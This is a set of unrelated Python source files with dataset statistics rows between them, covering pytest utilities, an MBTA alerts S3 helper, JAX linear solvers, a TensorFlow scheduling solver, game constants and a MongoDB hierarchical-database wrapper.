pytest.param(None, "inventory", "file", id="inventory"),
pytest.param(None, "job_template", "file", id="job_template"),
pytest.param(None, "workflow", "file", id="workflow"),
pytest.param("Unsupported asset type 'ABC123XYZ'!",
"ABC123XYZ", "file", id="unsupported asset type")
]
)
@mock.patch("atacac._utils.Receiver")
def test_tower_receive(mock_Receiver, error, asset_type, asset_name):
dictionary = {"dictA": {"key_1": "value_1"}, "dictB": {"key_2": "value_2"}}
mock_instance = mock_Receiver.return_value
mock_instance.export_assets.return_value = dictionary
try:
assert _utils.tower_receive(asset_type, asset_name) == dictionary
except _utils.Error as e:
assert str(e) == error
assert e.error_code == 1
else:
mock_Receiver.assert_called_once()
mock_instance.export_assets.assert_called_once()
mock_instance.export_assets.assert_called_with(all=False, asset_input={asset_type: [asset_name]})
@pytest.mark.parametrize(
"assets",
[
pytest.param("foo", id="file"),
pytest.param(["foo", "bar"], id="file list"),
]
)
@mock.patch("atacac._utils.Sender")
def test_tower_send(mock_Sender, assets):
mock_instance = mock_Sender.return_value
_utils.tower_send(assets)
mock_Sender.assert_called_once()
mock_Sender.assert_called_with(False)
mock_instance.send.assert_called_once()
mock_instance.send.assert_called_with(
assets if isinstance(assets, list) else [assets], None, None, "default")
def test_load_asset_valid_path():
file_data = textwrap.dedent(
"""\
---
key_a:
key_i: foo
key_j: 111
key_b:
key_x: bar
key_y: 222
"""
)
with tempfile.NamedTemporaryFile() as tmpfile:
tmpfile.write(bytes(file_data, encoding="utf-8"))
tmpfile.seek(0)
result = _utils.load_asset(tmpfile.name)
assert result == yaml.safe_load(file_data)
def test_load_asset_invalid_path():
try:
_utils.load_asset("./a/b/c/d/e/f/g/h/i/file")
except _utils.Error as e:
assert re.match(r"^Failed to read content of '\./a/b/c/d/e/f/g/h/i/file'$", str(e))
assert e.error_code == 1
@pytest.mark.parametrize(
"value, sanitized",
[
pytest.param('foo_bar.yml', 'foo_bar.yml'),
pytest.param('foo/bar.yml', 'foo_bar.yml'),
pytest.param('foo///bar.yml', 'foo_bar.yml'),
pytest.param('foo.bar.yml', 'foo.bar.yml'),
pytest.param('foo-bar.yml', 'foo-bar.yml'),
pytest.param('foo bar baz foo bar.job.yml', 'foo_bar_baz_foo_bar.job.yml'),
]
)
def test_sanitize(value, sanitized):
assert _utils.sanitize_filename(value) == sanitized
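# To run this module directly (assuming pytest is installed):
#   pytest test/test_atacac/test__utils.py -v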
| 35.545852 | 105 | 0.625799 | 1,028 | 8,140 | 4.763619 | 0.142996 | 0.116806 | 0.067388 | 0.028589 | 0.556872 | 0.446396 | 0.373902 | 0.260363 | 0.239126 | 0.155401 | 0 | 0.007393 | 0.202334 | 8,140 | 228 | 106 | 35.701754 | 0.746804 | 0 | 0 | 0.117978 | 0 | 0.005618 | 0.255814 | 0.035009 | 0 | 0 | 0 | 0 | 0.146067 | 1 | 0.050562 | false | 0 | 0.044944 | 0.005618 | 0.101124 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
680265a46b2454e377941d3516c73e1d1910e868 | 1,010 | py | Python | server/chalicelib/s3_alerts.py | mathcolo/t-performance-dash | 497fcadceda15d62d1fd6b39817306d48c2c4be5 | [
"MIT"
] | 1 | 2020-03-06T02:09:02.000Z | 2020-03-06T02:09:02.000Z | server/chalicelib/s3_alerts.py | mathcolo/t-performance-dash | 497fcadceda15d62d1fd6b39817306d48c2c4be5 | [
"MIT"
] | 11 | 2019-11-21T23:12:53.000Z | 2019-11-22T02:26:48.000Z | server/chalicelib/s3_alerts.py | mathcolo/t-performance-dash | 497fcadceda15d62d1fd6b39817306d48c2c4be5 | [
"MIT"
] | 1 | 2020-03-06T02:12:23.000Z | 2020-03-06T02:12:23.000Z | import json
from chalicelib import MbtaPerformanceAPI, s3
def routes_for_alert(alert):
routes = set()
try:
for alert_version in alert["alert_versions"]:
for informed_entity in alert_version["informed_entity"]:
if "route_id" in informed_entity:
routes.add(informed_entity["route_id"])
except KeyError as e:
print(f"Handled KeyError: Couldn't access {e} from alert {alert}")
return routes
def key(day):
return f"Alerts/{str(day)}.json.gz"
def get_alerts(day, routes):
alerts_str = s3.download(key(day), "utf8")
alerts = json.loads(alerts_str)[0]["past_alerts"]
def matches_route(alert):
targets = routes_for_alert(alert)
return any(r in targets for r in routes)
return list(filter(matches_route, alerts))
def store_alerts(day):
api_data = MbtaPerformanceAPI.get_api_data("pastalerts", {}, day)
alerts = json.dumps(api_data).encode("utf8")
s3.upload(key(day), alerts, True)
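# Usage sketch (assumes AWS credentials and the MBTA performance API are reachable;
# the date and route names are illustrative):
#
#   from datetime import date
#   store_alerts(date(2020, 1, 15))                 # fetch and upload that day's alerts
#   alerts = get_alerts(date(2020, 1, 15), ['Red']) # alerts touching the Red line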
| 27.297297 | 74 | 0.665347 | 138 | 1,010 | 4.695652 | 0.413043 | 0.061728 | 0.04321 | 0.058642 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007614 | 0.219802 | 1,010 | 36 | 75 | 28.055556 | 0.814721 | 0 | 0 | 0 | 0 | 0 | 0.153465 | 0.024752 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.08 | 0.04 | 0.44 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
68049a81228436d30d12cebcbf7ce433b752d03b | 1,415 | py | Python | tests/data/debugtalk.py | jackleitao/HttpRunner | 75a9020e900f4232a70e4d5a82f17503fc0315b7 | [
"MIT"
] | null | null | null | tests/data/debugtalk.py | jackleitao/HttpRunner | 75a9020e900f4232a70e4d5a82f17503fc0315b7 | [
"MIT"
] | null | null | null | tests/data/debugtalk.py | jackleitao/HttpRunner | 75a9020e900f4232a70e4d5a82f17503fc0315b7 | [
"MIT"
] | null | null | null | import hashlib
import hmac
import json
import os
import random
import string
import time
try:
string_type = basestring
PYTHON_VERSION = 2
import urllib
except NameError:
string_type = str
PYTHON_VERSION = 3
import urllib.parse as urllib
SECRET_KEY = "DebugTalk"
BASE_URL = "http://127.0.0.1:5000"
def get_sign(*args):
content = ''.join(args).encode('ascii')
sign_key = SECRET_KEY.encode('ascii')
sign = hmac.new(sign_key, content, hashlib.sha1).hexdigest()
return sign
get_sign_lambda = lambda *args: hmac.new(
'DebugTalk'.encode('ascii'),
''.join(args).encode('ascii'),
hashlib.sha1).hexdigest()
def gen_md5(*args):
return hashlib.md5("".join(args).encode('utf-8')).hexdigest()
def sum_status_code(status_code, expect_sum):
""" sum status code digits
e.g. 400 => 4, 201 => 3
"""
sum_value = 0
for digit in str(status_code):
sum_value += int(digit)
assert sum_value == expect_sum
os.environ["TEST_ENV"] = "PRODUCTION"
def skip_test_in_production_env():
""" skip this test in production environment
"""
return os.environ["TEST_ENV"] == "PRODUCTION"
def gen_app_version():
return [
{"app_version": "2.8.5"},
{"app_version": "2.8.6"}
]
def get_account():
return [
{"username": "user1", "password": "111111"},
{"username": "user2", "password": "222222"}
]
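# Quick illustration of the helpers above (values are arbitrary; no f-strings,
# since this file keeps Python 2 compatibility):
if __name__ == "__main__":
    assert get_sign("a", "b") == get_sign_lambda("a", "b")
    sum_status_code(201, 3)  # 2 + 0 + 1 == 3, so the assert inside passes
    print(skip_test_in_production_env())  # True: TEST_ENV was set above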
| 22.460317 | 65 | 0.639576 | 189 | 1,415 | 4.613757 | 0.428571 | 0.050459 | 0.048165 | 0.043578 | 0.066514 | 0.066514 | 0 | 0 | 0 | 0 | 0 | 0.041256 | 0.212014 | 1,415 | 62 | 66 | 22.822581 | 0.740807 | 0.065018 | 0 | 0.043478 | 0 | 0 | 0.143408 | 0 | 0 | 0 | 0 | 0 | 0.021739 | 1 | 0.130435 | false | 0.043478 | 0.195652 | 0.065217 | 0.434783 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6806ca0ceffb62909223de20352910ab5f4bed2b | 5,677 | py | Python | jaxopt/_src/linear_solve.py | gowerrobert/jaxopt | ed32d5e1d0104793a46f837a0594dae754dd4e2d | [
"Apache-2.0"
] | null | null | null | jaxopt/_src/linear_solve.py | gowerrobert/jaxopt | ed32d5e1d0104793a46f837a0594dae754dd4e2d | [
"Apache-2.0"
] | null | null | null | jaxopt/_src/linear_solve.py | gowerrobert/jaxopt | ed32d5e1d0104793a46f837a0594dae754dd4e2d | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Linear system solvers."""
from typing import Any
from typing import Callable
from typing import Optional
import jax
import jax.numpy as jnp
from jaxopt._src.tree_util import tree_add_scalar_mul
def _materialize_array(matvec, shape, dtype=None):
"""Materializes the matrix A used in matvec(x) = Ax."""
x = jnp.zeros(shape, dtype)
return jax.jacfwd(matvec)(x)
def _make_ridge_matvec(matvec: Callable, ridge: float = 0.0):
def ridge_matvec(v: Any) -> Any:
return tree_add_scalar_mul(matvec(v), ridge, v)
return ridge_matvec
def solve_lu(matvec: Callable, b: jnp.ndarray) -> jnp.ndarray:
"""Solves ``A x = b`` using ``jax.lax.solve``.
This solver is based on an LU decomposition.
It will materialize the matrix ``A`` in memory.
Args:
matvec: product between ``A`` and a vector.
b: array.
Returns:
array with same structure as ``b``.
"""
if len(b.shape) == 0:
return b / _materialize_array(matvec, b.shape)
elif len(b.shape) == 1:
A = _materialize_array(matvec, b.shape, b.dtype)
return jax.numpy.linalg.solve(A, b)
elif len(b.shape) == 2:
A = _materialize_array(matvec, b.shape, b.dtype) # 4d array (tensor)
A = A.reshape(-1, b.shape[0] * b.shape[1]) # 2d array (matrix)
return jax.numpy.linalg.solve(A, b.ravel()).reshape(*b.shape)
else:
raise NotImplementedError
def solve_cholesky(matvec: Callable, b: jnp.ndarray) -> jnp.ndarray:
"""Solves ``A x = b``, using Cholesky decomposition.
It will materialize the matrix ``A`` in memory.
Args:
matvec: product between positive definite matrix ``A`` and a vector.
b: array.
Returns:
array with same structure as ``b``.
"""
if len(b.shape) == 0:
return b / _materialize_array(matvec, b.shape)
elif len(b.shape) == 1:
A = _materialize_array(matvec, b.shape)
return jax.scipy.linalg.solve(A, b, sym_pos=True)
elif len(b.shape) == 2:
A = _materialize_array(matvec, b.shape)
return jax.scipy.linalg.solve(A, b.ravel(), sym_pos=True).reshape(*b.shape)
else:
raise NotImplementedError
def solve_cg(matvec: Callable,
b: Any,
ridge: Optional[float] = None,
init: Optional[Any] = None,
**kwargs) -> Any:
"""Solves ``A x = b`` using conjugate gradient.
It assumes that ``A`` is a Hermitian, positive definite matrix.
Args:
matvec: product between ``A`` and a vector.
b: pytree.
ridge: optional ridge regularization.
init: optional initialization to be used by conjugate gradient.
**kwargs: additional keyword arguments for solver.
Returns:
pytree with same structure as ``b``.
"""
if ridge is not None:
matvec = _make_ridge_matvec(matvec, ridge=ridge)
return jax.scipy.sparse.linalg.cg(matvec, b, x0=init, **kwargs)[0]
def _rmatvec(matvec, x):
"""Computes A^T x, from matvec(x) = A x, where A is square."""
transpose = jax.linear_transpose(matvec, x)
return transpose(x)[0]
def _normal_matvec(matvec, x):
"""Computes A^T A x from matvec(x) = A x, where A is square."""
matvec_x, vjp = jax.vjp(matvec, x)
return vjp(matvec_x)[0]
def solve_normal_cg(matvec: Callable,
b: Any,
ridge: Optional[float] = None,
**kwargs) -> Any:
"""Solves the normal equation ``A^T A x = A^T b`` using conjugate gradient.
This can be used to solve Ax=b using conjugate gradient when A is not
hermitian, positive definite.
Args:
matvec: product between ``A`` and a vector.
b: pytree.
ridge: optional ridge regularization.
**kwargs: additional keyword arguments for solver.
Returns:
pytree with same structure as ``b``.
"""
def _matvec(x):
"""Computes A^T A x."""
return _normal_matvec(matvec, x)
if ridge is not None:
_matvec = _make_ridge_matvec(_matvec, ridge=ridge)
Ab = _rmatvec(matvec, b)
return jax.scipy.sparse.linalg.cg(_matvec, Ab, **kwargs)[0]
def solve_gmres(matvec: Callable,
b: Any,
ridge: Optional[float] = None,
tol: float = 1e-5,
**kwargs) -> Any:
"""Solves ``A x = b`` using gmres.
Args:
matvec: product between ``A`` and a vector.
b: pytree.
ridge: optional ridge regularization.
**kwargs: additional keyword arguments for solver.
Returns:
pytree with same structure as ``b``.
"""
if ridge is not None:
matvec = _make_ridge_matvec(matvec, ridge=ridge)
return jax.scipy.sparse.linalg.gmres(matvec, b, tol=tol, **kwargs)[0]
def solve_bicgstab(matvec: Callable,
b: Any,
ridge: Optional[float] = None,
**kwargs) -> Any:
"""Solves ``A x = b`` using bicgstab.
Args:
matvec: product between ``A`` and a vector.
b: pytree.
ridge: optional ridge regularization.
**kwargs: additional keyword arguments for solver.
Returns:
pytree with same structure as ``b``.
"""
if ridge is not None:
matvec = _make_ridge_matvec(matvec, ridge=ridge)
return jax.scipy.sparse.linalg.bicgstab(matvec, b, **kwargs)[0]
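# Usage sketch (a toy symmetric positive definite system; illustrative only,
# not part of the library's public examples):
if __name__ == "__main__":
  A = jnp.array([[4.0, 1.0], [1.0, 3.0]])
  b = jnp.array([1.0, 2.0])
  matvec = lambda x: jnp.dot(A, x)
  x_cg = solve_cg(matvec, b)
  x_lu = solve_lu(matvec, b)
  print(jnp.allclose(x_cg, x_lu, atol=1e-4))  # both solve the same system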
| 29.414508 | 80 | 0.6551 | 814 | 5,677 | 4.493857 | 0.213759 | 0.026244 | 0.0421 | 0.039366 | 0.579552 | 0.572171 | 0.572171 | 0.529524 | 0.47895 | 0.466922 | 0 | 0.006814 | 0.224414 | 5,677 | 192 | 81 | 29.567708 | 0.823984 | 0.445482 | 0 | 0.466667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.16 | false | 0 | 0.08 | 0.013333 | 0.453333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
68075b32246e32044e505785091c503b9148dc65 | 4,023 | py | Python | msp/solvers/_random_solver.py | bilalsp/msp | a336e9dfc3aa19352c21de5d3ce90d2b5c6f38c6 | [
"MIT"
] | 2 | 2021-12-26T02:40:19.000Z | 2022-01-14T05:44:48.000Z | msp/solvers/_random_solver.py | bilalsp/msp | a336e9dfc3aa19352c21de5d3ce90d2b5c6f38c6 | [
"MIT"
] | null | null | null | msp/solvers/_random_solver.py | bilalsp/msp | a336e9dfc3aa19352c21de5d3ce90d2b5c6f38c6 | [
"MIT"
] | null | null | null | """
The :mod:`mps.solvers._random_solver` module defines random solver.
Note: Random solver return best schedule from pre-defined search space decided
based on parameter `best_out_of`.
"""
import functools
import tensorflow as tf
import tensorflow_probability as tfp
from msp.utils import MSPEnv
from msp.utils.objective import compute_makespan
class RandomSolver(tf.Module):
def __init__(self, best_out_of=100, seed=None, **kwargs):
super(RandomSolver, self).__init__(**kwargs)
self.msp_env = MSPEnv()
self.best_out_of = best_out_of
self.seed = seed
self.is_build = False
if seed:
self.rand_gen = tf.random.experimental.Generator.from_seed(seed, alg="philox")
else:
self.rand_gen = tf.random.Generator.from_non_deterministic_state()
def build(self, input_shape):
batch_size, num_node, num_node = input_shape.adj_matrix
self.best_schedules = tf.Variable(
initial_value=tf.zeros((batch_size, num_node, 2), dtype=tf.int64),
trainable=False)
self.best_makespans = tf.Variable(
initial_value=tf.constant(1e10, shape=(batch_size,1)),
trainable=False)
self.msp_env.build(input_shape)
self.is_build = True
def __call__(self, inputs):
# Create variables on first call.
if not self.is_build:
self.build(inputs.shape)
# reintialize variables on each call.
self.reset(inputs.shape)
for _ in range(self.best_out_of):
# randomly generates schedules
schedules, makespans = self._gen_rand_schedules(inputs)
# update best schedule and makespan
self.update(schedules, makespans)
return self.best_schedules, self.best_makespans
def reset(self, input_shape):
batch_size, num_node, num_node = input_shape.adj_matrix
best_schedules_shape = (batch_size, num_node, 2)
best_makespans_shape = (batch_size, 1)
self.best_schedules.assign(
tf.zeros(best_schedules_shape, dtype=self.best_schedules.dtype))
self.best_makespans.assign(
tf.constant(1e10, shape=best_makespans_shape, dtype=self.best_makespans.dtype))
def update(self, schedules, makespans):
self.best_schedules.assign(
tf.where(
tf.less(makespans, self.best_makespans)[:,:,tf.newaxis],
schedules,
self.best_schedules
))
self.best_makespans.assign(
tf.where(
tf.less(makespans, self.best_makespans),
makespans,
self.best_makespans
))
@tf.function
def _gen_rand_schedules(self, inputs):
"""Generates a random schedule for a given input."""
schedules = tf.TensorArray(tf.int64, size=0, dynamic_size=True)
time_step = self.msp_env.reset()
step = 0
while not time_step.is_last():
selected_node = self._select_node(time_step.mask)
actions = {'inputs': inputs, 'selected_node': selected_node}
time_step = self.msp_env.step(actions)
schedules = schedules.write(step, tf.stack([selected_node, time_step.mrg_machine], axis=-1))
step += 1
# TensorArray --> Tensor
schedules = tf.transpose(schedules.stack(), perm=[1,0,2,3])
schedules = tf.squeeze(schedules)
# B x V x 2
schedules = tf.concat(schedules, axis=1)
return schedules, compute_makespan(inputs, schedules)
def _select_node(self, mask):
"""Randomly select a node based on mask."""
rand_logits = self.rand_gen.normal(mask.shape) + mask
rand_probs = tf.nn.softmax(rand_logits, axis=-1)
dist = tfp.distributions.Categorical(probs=rand_probs, dtype=tf.int64)
selected_node = tf.squeeze(dist.sample(1, seed=self.seed), axis=0)
return selected_node
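# Usage sketch (fully hypothetical: `problem` stands for whatever batched MSP
# instance the surrounding code base builds, carrying an `adj_matrix` field of
# shape (batch, nodes, nodes) that `build` reads from `inputs.shape`):
#
#   solver = RandomSolver(best_out_of=100, seed=42)
#   schedules, makespans = solver(problem)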
| 36.908257 | 104 | 0.633607 | 497 | 4,023 | 4.901408 | 0.28169 | 0.055829 | 0.055829 | 0.026273 | 0.216749 | 0.110837 | 0.082923 | 0.082923 | 0.082923 | 0.045977 | 0 | 0.010888 | 0.269451 | 4,023 | 109 | 105 | 36.908257 | 0.817965 | 0.107631 | 0 | 0.157895 | 0 | 0 | 0.007007 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.092105 | false | 0 | 0.065789 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
680a6737d084b2f058e0fb395e8f516c4aaa0aea | 1,714 | py | Python | muddery/utils/defines.py | noahzaozao/muddery | 294da6fb73cb04c62e5ba6eefe49b595ca76832a | [
"BSD-3-Clause"
] | null | null | null | muddery/utils/defines.py | noahzaozao/muddery | 294da6fb73cb04c62e5ba6eefe49b595ca76832a | [
"BSD-3-Clause"
] | null | null | null | muddery/utils/defines.py | noahzaozao/muddery | 294da6fb73cb04c62e5ba6eefe49b595ca76832a | [
"BSD-3-Clause"
] | null | null | null | """
This module defines constent constant values.
"""
# quest dependencies
DEPENDENCY_NONE = ""
DEPENDENCY_QUEST_CAN_PROVIDE = "CAN_PROVIDE"
DEPENDENCY_QUEST_ACCEPTED = "ACCEPTED"
DEPENDENCY_QUEST_NOT_ACCEPTED = "NOT_ACCEPTED"
DEPENDENCY_QUEST_IN_PROGRESS = "IN_PROGRESS"
DEPENDENCY_QUEST_NOT_IN_PROGRESS = "NOT_IN_PROGRESS"
DEPENDENCY_QUEST_ACCOMPLISHED = "ACCOMPLISHED" # quest accomplished
DEPENDENCY_QUEST_NOT_ACCOMPLISHED = "NOT_ACCOMPLISHED" # quest accepted but not accomplished
DEPENDENCY_QUEST_COMPLETED = "COMPLETED" # quest complete
DEPENDENCY_QUEST_NOT_COMPLETED = "NOT_COMPLETED" # quest accepted but not complete
# quest objective types
OBJECTIVE_NONE = ""
OBJECTIVE_TALK = "OBJECTIVE_TALK" # finish a dialogue, object: dialogue_id
OBJECTIVE_ARRIVE = "OBJECTIVE_ARRIVE" # arrive a room, object: room_id
OBJECTIVE_OBJECT = "OBJECTIVE_OBJECT" # get some objects, object: object_id
OBJECTIVE_KILL = "OBJECTIVE_KILL" # kill some characters, object: character_id
# event trigger types
EVENT_TRIGGER_NONE = 0
EVENT_TRIGGER_ARRIVE = "EVENT_TRIGGER_ARRIVE" # at attriving a room. object: room_id
EVENT_TRIGGER_KILL = "EVENT_TRIGGER_KILL" # caller kills one. object: dead_one_id
EVENT_TRIGGER_DIE = "EVENT_TRIGGER_DIE" # caller die. object: killer_id
EVENT_TRIGGER_TRAVERSE = "EVENT_TRIGGER_TRAVERSE" # before traverse an exit. object: exit_id
EVENT_TRIGGER_ACTION = "EVENT_TRIGGER_ACTION" # called when a character act to an object
# event types
EVENT_NONE = ""
EVENT_ATTACK = "EVENT_ATTACK" # event to begin a combat
EVENT_DIALOGUE = "EVENT_DIALOGUE" # event to begin a dialogue
| 47.611111 | 94 | 0.753792 | 212 | 1,714 | 5.726415 | 0.278302 | 0.118616 | 0.057661 | 0.041186 | 0.028007 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000712 | 0.180863 | 1,714 | 35 | 95 | 48.971429 | 0.86396 | 0.354142 | 0 | 0 | 0 | 0 | 0.26827 | 0.020352 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
680b6cd878f9ea3ef233e78c3581a9213fd0cb7b | 7,450 | py | Python | src/branch.py | danielstuart14/branch | 84018288279f701d31e2b7866c77b6e68a170b46 | [
"Apache-2.0"
] | null | null | null | src/branch.py | danielstuart14/branch | 84018288279f701d31e2b7866c77b6e68a170b46 | [
"Apache-2.0"
] | null | null | null | src/branch.py | danielstuart14/branch | 84018288279f701d31e2b7866c77b6e68a170b46 | [
"Apache-2.0"
] | null | null | null | """
BranchDB - A Multilevel Database
A layer for MongoDB that behaves as a multilevel/hierarchical database
Author: Daniel P. Stuart
This software is licensed under Apache License 2.0
"""
import pymongo
import json
from bson.objectid import ObjectId
import re
import itertools
# MongoDB Connection
class connect():
def __init__(self, server, name):
print("Initializing client...")
client = pymongo.MongoClient(server)
client.admin.command('ismaster')
if not(name in client.database_names()):
print("Creating %s database..." % name)
self.db = client[name]
if not(self.__collectionExists("/")) or not(self.__collectionExists("index")):
print("Creating root and index collections...")
self.__createCollection("/")
self.__createCollection("index")
print("Client ready!\n")
# Collection Functions
def __getCollections(self):
return self.db.collection_names()
def __collectionExists(self, collection):
if collection in self.__getCollections():
return True
return False
def __createCollection(self, collection):
self.db.create_collection(collection)
def __readCollection(self, collection):
return list(self.db[collection].find({}))
def __deleteCollection(self, collection):
if collection in ["index","/"]:
raise PermissionError("%s can't be deleted!" % collection)
if not(self.__collectionExists(collection)):
raise FileNotFoundError("%s doesn't exist!" % collection)
if self.isAncestor(collection):
raise FileExistsError("%s has descendants!" % collection)
self.db[collection].drop()
def __pathToCollection(self, path):
if path != "index" and path != "/":
if path.endswith("/"):
path = path[:-1]
ret = list(self.db["index"].find({"path": path}).limit(1))
if len(ret) == 1:
return str(ret[0]["_id"])
raise FileNotFoundError("Path %s doesn't exist!" % path)
return path
# Object Functions
def createObject(self, value, path):
collection = self.__pathToCollection(path)
return self.__createObject(value, collection)
def __createObject(self, value, collection):
if isinstance(value, str):
value = json.loads(value)
insert = self.db[collection].insert_one(value)
return str(insert.inserted_id)
def readObject(self, obj_id, path):
collection = self.__pathToCollection(path)
return self.__readObject(obj_id, collection)
def __readObject(self, obj_id, collection):
id = {}
id["_id"] = ObjectId(obj_id)
ret = list(self.db[collection].find(id).limit(1))
if len(ret) == 1:
return ret[0]
raise FileNotFoundError(obj_id + " at " + collection + " doesn't exist!")
def updateObject(self, value, obj_id, path):
collection = self.__pathToCollection(path)
self.__updateObject(value, obj_id, collection)
def __updateObject(self, value, obj_id, collection):
if collection == "index":
raise PermissionError("Index can't have its objects updated!")
id = {}
id["_id"] = ObjectId(obj_id)
changes = {}
if isinstance(value, str):
changes["$set"] = json.loads(value)
else:
changes["$set"] = value
self.db[collection].update(id,changes)
def deleteObject(self, obj_id, path):
collection = self.__pathToCollection(path)
self.__deleteObject(obj_id, collection)
def __deleteObject(self, obj_id, collection):
if not(self.__objectExists(obj_id, collection)):
raise FileNotFoundError(obj_id + " at " + collection + " doesn't exist!")
if collection != "index" and self.hasPath(obj_id, collection):
raise FileExistsError(obj_id + " at " + collection + " has a path!")
id = {}
id["_id"] = ObjectId(obj_id)
        # remove() is deprecated in pymongo; the _id filter targets one document
        self.db[collection].delete_one(id)
def getObjects(self, path):
if path == "/":
collection = path
else:
collection = self.__getChild(path)
        if collection is None:
return []
return self.__readCollection(collection)
def objectExists(self, value, path):
collection = self.__pathToCollection(path)
return self.__objectExists(value, collection)
def __objectExists(self, value, collection):
if isinstance(value, str):
if ObjectId.is_valid(value):
value = {"_id": ObjectId(value)}
else:
value = json.loads(value)
return bool(self.db[collection].count_documents(value, limit = 1))
def searchObject(self, value, path):
collection = self.__pathToCollection(path)
return self.__searchObject(value, collection)
def __searchObject(self, value, collection):
if collection == "index":
raise PermissionError("Index isn't searchable!")
if isinstance(value, str):
value = json.loads(value)
ret = list(self.db[collection].find(value).limit(1))
if len(ret) == 1:
return ret[0]
return None
# Index Functions
def getPath(self, obj_id, path):
if not(path.endswith("/")):
path += "/"
return (path + obj_id)
def __getPath(self, collection):
if collection == "/":
return collection
parent = self.__readObject(collection, "index")
return parent["path"]
def hasPath(self, obj_id, path):
value = {}
if not(path.endswith("/")):
path += "/"
value["path"] = path + obj_id
return self.__objectExists(value, "index")
def isAncestor(self, obj_id, path=None):
        if path is None and self.__collectionExists(obj_id):
            path = self.__getPath(obj_id)
        else:
            path = self.__getChild(obj_id, path)
        if path is None:
            return False
path = self.__getPath(path)
path += "/"
        # raw string avoids the invalid "\/" escape-sequence warning
        path = path.replace("/", r"\/")
value = {"path": {"$regex": path}}
return self.__objectExists(value, "index")
def createPath(self, obj_id, path):
value = {}
if not(path.endswith("/")):
path += "/"
value["path"] = path + obj_id
if self.__objectExists(value, "index"):
raise FileExistsError("%s already has a child!" % value["path"])
id = self.__createObject(value, "index")
self.__createCollection(str(id))
return value["path"]
def __getChild(self, obj_id, path=""):
if path == "":
path = obj_id
else:
if not(path.endswith("/")):
path += "/"
path += obj_id
search = {}
search["path"] = path
ret = list(self.db["index"].find(search).limit(1))
if len(ret) == 1:
return str(ret[0]["_id"])
return None
def getChildren(self, obj_id, path):
collection = self.__getChild(obj_id, path)
        if collection is None:
return []
return self.__readCollection(collection)
def deletePath(self, obj_id, path):
child = self.__getChild(obj_id, path)
        if child is None:
raise FileNotFoundError(obj_id + " at " + path + " doesn't have a child!")
if self.isAncestor(child):
raise FileExistsError(obj_id + " at " + path + " has descendants!")
self.__deleteCollection(child)
self.__deleteObject(child, "index")
def getStructure(self, path="/"):
if not(path.endswith("/")):
path += "/"
        regex = path.replace("/", r"\/")
regex = regex + ".*"
value = {"path": {"$regex": regex}}
objects = self.db["index"].distinct("path", value)
if objects:
objects.sort(key=len)
objects = [list(obj) for (i, obj) in itertools.groupby(objects, key=len)]
def createStructure(objects, regex=""):
if regex != "":
regex = re.compile(regex)
objects[0] = list(filter(regex.match, objects[0]))
if not(objects[0]):
return None
ret = {}
separator = len(objects[0][0]) - 24
if len(objects) == 1:
for obj in objects[0]:
ret[obj[separator:]] = None
return ret
for obj in objects[0]:
ret[obj[separator:]] = createStructure(objects[1:], obj)
return ret
return createStructure(objects)
